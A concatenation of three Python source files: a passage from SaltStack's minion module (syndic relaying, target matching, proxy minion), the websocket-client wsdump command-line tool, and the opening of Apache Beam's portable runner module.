'User {0[user]} Executing syndic command {0[fun]} with ' # pylint: disable=W1307
'jid {0[jid]}'.format(
data
)
)
else:
log.debug(
'Executing syndic command {0[fun]} with jid {0[jid]}'.format( # pylint: disable=W1307
data
)
)
log.debug('Command details: {0}'.format(data))
self._handle_decoded_payload(data)
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
try:
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
**kwargs)
except Exception as exc:
log.warning('Unable to forward pub data: {0}'.format(exc))
def _setsockopts(self):
# no filters for syndication masters, unless we want to maintain a
# list of all connected minions and update the filter
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
self._set_reconnect_ivl_max()
self._set_tcp_keepalive()
self._set_ipv4only()
def _fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self._init_context_and_poller()
self.socket = self.context.socket(zmq.SUB)
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
loop_interval = int(self.opts['loop_interval'])
self._fire_master_syndic_start()
while True:
try:
socks = dict(self.poller.poll(loop_interval * 1000))
if socks.get(self.socket) == zmq.POLLIN:
self._process_cmd_socket()
except zmq.ZMQError:
yield True
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
yield True
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id']))
self._init_context_and_poller()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
# register the event sub to the poller
self.poller.register(self.local.event.sub)
# Start with the publish socket
# Share the poller with the event object
self.socket = self.context.socket(zmq.SUB)
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
# Send an event to the master that the minion is live
self._fire_master_syndic_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
loop_interval = int(self.opts['loop_interval'])
self._reset_event_aggregation()
while True:
try:
# Do all the maths in seconds
timeout = loop_interval
if self.event_forward_timeout is not None:
timeout = min(timeout,
self.event_forward_timeout - time.time())
if timeout >= 0:
log.trace('Polling timeout: %f', timeout)
socks = dict(self.poller.poll(timeout * 1000))
else:
# This shouldn't really happen.
# But there's no harm being defensive
log.warning('Negative timeout in syndic main loop')
socks = {}
if socks.get(self.socket) == zmq.POLLIN:
self._process_cmd_socket()
if socks.get(self.local.event.sub) == zmq.POLLIN:
self._process_event_socket()
if self.event_forward_timeout is not None and \
self.event_forward_timeout < time.time():
self._forward_events()
# We don't handle ZMQErrors like the other minions
# I've put explicit handling around the receive calls
# in the process_*_socket methods. If we see any other
# errors they may need some kind of handling so log them
# for now.
except Exception:
log.critical(
'An exception occurred while polling the syndic',
exc_info=True
)
def _process_cmd_socket(self):
try:
messages = self.socket.recv_multipart(zmq.NOBLOCK)
messages_len = len(messages)
idx = None
if messages_len == 1:
idx = 0
elif messages_len == 2:
idx = 1
else:
raise SaltSyndicMasterError('Syndication master received message of invalid len ({0}/2)'.format(messages_len))
payload = self.serial.loads(messages[idx])
except zmq.ZMQError as e:
# Swallow errors for bad wakeups or signals needing processing
if e.errno != errno.EAGAIN and e.errno != errno.EINTR:
raise
log.trace('Handling payload')
self._handle_payload(payload)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
self.event_forward_timeout = None
def _process_event_socket(self):
tout = time.time() + self.opts['syndic_max_event_process_time']
while tout > time.time():
try:
event = self.local.event.get_event_noblock()
except zmq.ZMQError as e:
# EAGAIN indicates no more events at the moment
# EINTR some kind of signal maybe someone trying
# to get us to quit so escape our timeout
if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
break
raise
log.trace('Got event {0}'.format(event['tag']))
if self.event_forward_timeout is None:
self.event_forward_timeout = (
time.time() + self.opts['syndic_event_forward_timeout']
)
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
continue
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid], '_syndic_return')
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
self.poller = None
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
class MultiSyndic(MinionBase):
'''
Make a MultiSyndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts):
opts['loop_interval'] = 1
super(MultiSyndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self._has_master = threading.Event()
self.jid_forward_cache = set()
# create all of the syndics you need
self.master_syndics = {}
for master in set(self.opts['master']):
self._init_master_conn(master)
log.info('Syndic waiting on any master to connect...')
# threading events are un-interruptible in python 2 :/
while not self._has_master.is_set():
self._has_master.wait(1)
def _init_master_conn(self, master):
'''
Start a thread to connect to the master `master`
'''
# if we are re-creating one, lets make sure its not still in use
if master in self.master_syndics:
if 'sign_in_thread' in self.master_syndics[master]:
self.master_syndics[master]['sign_in_thread'].join(0)
if self.master_syndics[master]['sign_in_thread'].is_alive():
return
# otherwise we make one!
s_opts = copy.copy(self.opts)
s_opts['master'] = master
t = threading.Thread(target=self._connect_to_master_thread, args=(master,))
t.daemon = True
self.master_syndics[master] = {'opts': s_opts,
'auth_wait': s_opts['acceptance_wait_time'],
'dead_until': 0,
'sign_in_thread': t,
}
t.start()
def _connect_to_master_thread(self, master):
'''
Thread target to connect to a master
'''
connected = False
master_dict = self.master_syndics[master]
while connected is False:
# if we marked it as dead, wait a while
if master_dict['dead_until'] > time.time():
time.sleep(master_dict['dead_until'] - time.time())
if master_dict['dead_until'] > time.time():
time.sleep(master_dict['dead_until'] - time.time())
connected = self._connect_to_master(master)
if not connected:
time.sleep(1)
self._has_master.set()
# TODO: do we need all of this?
def _connect_to_master(self, master):
'''
Attempt to connect to master, including back-off for each one
return boolean of whether you connected or not
'''
log.debug('Syndic attempting to connect to {0}'.format(master))
if master not in self.master_syndics:
log.error('Unable to connect to {0}, not in the list of masters'.format(master))
return False
minion = self.master_syndics[master]
try:
t_minion = Syndic(minion['opts'],
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
)
self.master_syndics[master]['syndic'] = t_minion
self.master_syndics[master]['generator'] = t_minion.tune_in_no_block()
self.master_syndics[master]['auth_wait'] = self.opts['acceptance_wait_time']
self.master_syndics[master]['dead_until'] = 0
log.info('Syndic successfully connected to {0}'.format(master))
return True
except SaltClientError:
log.error('Error while bring up minion for multi-syndic. Is master {0} responding?'.format(master))
# re-use auth-wait as backoff for syndic
minion['dead_until'] = time.time() + minion['auth_wait']
if minion['auth_wait'] < self.opts['acceptance_wait_time_max']:
minion['auth_wait'] += self.opts['acceptance_wait_time']
return False
# TODO: Move to an async framework of some type-- channel (the event thing
# underneath) doesn't handle failures well, and will retry 3 times at 60s
# timeouts-- which all block the main thread's execution. For now we just
# cause failures to kick off threads to look for the master to come back up
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_dict in self.iter_master_options(master_id):
if 'syndic' not in syndic_dict:
continue
if syndic_dict['dead_until'] > time.time():
log.error('Unable to call {0} on {1}, that syndic is dead for now'.format(func, master))
continue
try:
ret = getattr(syndic_dict['syndic'], func)(*args, **kwargs)
if ret is not False:
log.debug('{0} called on {1}'.format(func, master))
return
except (SaltClientError, SaltReqTimeoutError):
pass
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
# If the connection is dead, lets have another thread wait for it to come back
self._init_master_conn(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self.master_syndics.keys())
shuffle(masters)
if master_id not in self.master_syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self.master_syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
self.event_forward_timeout = None
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
log.debug('MultiSyndic {0!r} trying to tune in'.format(self.opts['id']))
# Share the poller with the event object
self.poller = self.local.event.poller
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
loop_interval = int(self.opts['loop_interval'])
self._reset_event_aggregation()
while True:
try:
# Do all the maths in seconds
timeout = loop_interval
if self.event_forward_timeout is not None:
timeout = min(timeout,
self.event_forward_timeout - time.time())
if timeout >= 0:
log.trace('Polling timeout: %f', timeout)
socks = dict(self.poller.poll(timeout * 1000))
else:
# This shouldn't really happen.
# But there's no harm being defensive
log.warning('Negative timeout in syndic main loop')
socks = {}
# check all of your master_syndics, have them do their thing
for master_id, syndic_dict in six.iteritems(self.master_syndics):
# if not connected, lets try
if 'generator' not in syndic_dict:
log.info('Syndic still not connected to {0}'.format(master_id))
# if we couldn't connect, lets try later
continue
next(syndic_dict['generator'])
# events
if socks.get(self.local.event.sub) == zmq.POLLIN:
self._process_event_socket()
if self.event_forward_timeout is not None \
and self.event_forward_timeout < time.time():
self._forward_events()
# We don't handle ZMQErrors like the other minions
# I've put explicit handling around the receive calls
# in the process_*_socket methods. If we see any other
# errors they may need some kind of handling so log them
# for now.
except Exception:
log.critical(
'An exception occurred while polling the syndic',
exc_info=True
)
def _process_event_socket(self):
tout = time.time() + self.opts['syndic_max_event_process_time']
while tout > time.time():
try:
event = self.local.event.get_event_noblock()
except zmq.ZMQError as e:
# EAGAIN indicates no more events at the moment
# EINTR some kind of signal maybe someone trying
# to get us to quit so escape our timeout
if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
break
raise
log.trace('Got event {0}'.format(event['tag']))
if self.event_forward_timeout is None:
self.event_forward_timeout = (
time.time() + self.opts['syndic_event_forward_timeout']
)
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
continue
if self.syndic_mode == 'cluster' and event['data'].get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return recieved with matching master_id, not forwarding')
continue
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._call_syndic('_fire_master',
kwargs={'events': self.raw_events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
},
)
for jid, jid_ret in self.jids.items():
self._call_syndic('_return_pub',
args=(jid_ret, '_syndic_return'),
kwargs={'timeout': self.SYNDIC_EVENT_TIMEOUT},
master_id=jid_ret.get('__master_id__'),
)
self._reset_event_aggregation()
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on ip address or CIDR notation
'''
num_parts = len(tgt.split('/'))
if num_parts > 2:
# Target is not valid CIDR
return False
elif num_parts == 2:
# Target is CIDR
return salt.utils.network.in_subnet(
tgt,
addrs=self.opts['grains'].get('ipv4', [])
)
else:
# Target is an IPv4 address
import socket
try:
socket.inet_aton(tgt)
except socket.error:
# Not a valid IPv4 address
return False
else:
return tgt in self.opts['grains'].get('ipv4', [])
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types):
log.debug('Compound target received that is not a string')
return False
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'L': 'list',
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
tokens = tgt.split()
for match in tokens:
# Try to match tokens from the compound target, first by using
# the 'G, X, I, L, S, E' matcher types, then by hostname glob.
if '@' in match and match[1] == '@':
comps = match.split('@')
matcher = ref.get(comps[0])
if not matcher:
# If an unknown matcher is called at any time, fail out
return False
results.append(
str(
getattr(self, '{0}_match'.format(matcher))(
'@'.join(comps[1:])
)
)
)
elif match in opers:
# We didn't match a target, so append a boolean operator or
# subexpression
if results or match in ['(', ')']:
if match == 'not':
match_suffix = results[-1]
if not (match_suffix == 'and' or match_suffix == 'or'):
results.append('and')
results.append(match)
else:
# seq start with oper, fail
if match not in ['(', ')']:
return False
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(match)))
results = ' '.join(results)
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module
# print opts['proxymodule']
fq_proxyname = 'proxy.'+opts['proxy']['proxytype']
self.proxymodule = salt.loader.proxy(opts, fq_proxyname)
opts['proxyobject'] = self.proxymodule[opts['proxy']['proxytype']+'.Proxyconn'](opts['proxy'])
opts['id'] = opts['proxyobject'].id(opts)
opts.update(resolve_dns(opts))
self.opts = opts
self.authenticate(timeout, safe)
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment']
).compile_pillar()
self.functions, self.returners, self.function_errors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
uid = salt.utils.get_uid(user=opts.get('user', None))
self.proc_dir = get_proc_dir(opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
self.grains_cache = self.opts['grains']
# self._running = True
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
return super(ProxyMinion, self)._prep_mod_opts()
def _load_modules(self, force_refresh=False, notify=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
return super(ProxyMinion, self)._load_modules(force_refresh=force_refresh, notify=notify)
|
wsdump.py
|
#!/usr/bin/env python
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = list(map(str.strip, args.headers.split(',')))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if isinstance(data, bytes) and len(data)>2 and data[:2] == b'\037\213': # gzip magick
try:
data = "[gzip] " + str(gzip.decompress(data), "utf-8")
except:
pass
elif isinstance(data, bytes):
try:
data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
except:
pass
if isinstance(data, bytes):
data = repr(data)
if args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
else:
msg = data
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
portable_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
from __future__ import absolute_import
from __future__ import division
import atexit
import functools
import itertools
import logging
import threading
import time
from typing import TYPE_CHECKING
from typing import Any
from typing import Iterator
from typing import Optional
from typing import Tuple
import grpc
from apache_beam.metrics import metric
from apache_beam.metrics.execution import MetricResult
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.options.value_provider import ValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import job_server
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability.fn_api_runner.fn_runner import translations
from apache_beam.runners.worker import sdk_worker_main
from apache_beam.runners.worker import worker_pool_main
from apache_beam.transforms import environments
if TYPE_CHECKING:
from google.protobuf import struct_pb2 # pylint: disable=ungrouped-imports
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.pipeline import Pipeline
from apache_beam.portability.api import beam_runner_api_pb2
__all__ = ['PortableRunner']
MESSAGE_LOG_LEVELS = {
beam_job_api_pb2.JobMessage.MESSAGE_IMPORTANCE_UNSPECIFIED: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DETAILED: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING: logging.WARNING,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR: logging.ERROR,
}
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.DRAINED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
ENV_TYPE_ALIASES = {'LOOPBACK': 'EXTERNAL'}
_LOGGER = logging.getLogger(__name__)
class JobServiceHandle(object):
"""
Encapsulates the interactions necessary to submit a pipeline to a job service.
The base set of interactions consists of 3 steps:
- prepare
- stage
- run
"""
def __init__(self, job_service, options, retain_unknown_options=False):
self.job_service = job_service
self.options = options
self.timeout = options.view_as(PortableOptions).job_server_timeout
self._retain_unknown_options = retain_unknown_options
def submit(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""
Submit and run the pipeline defined by `proto_pipeline`.
"""
prepare_response = self.prepare(proto_pipeline)
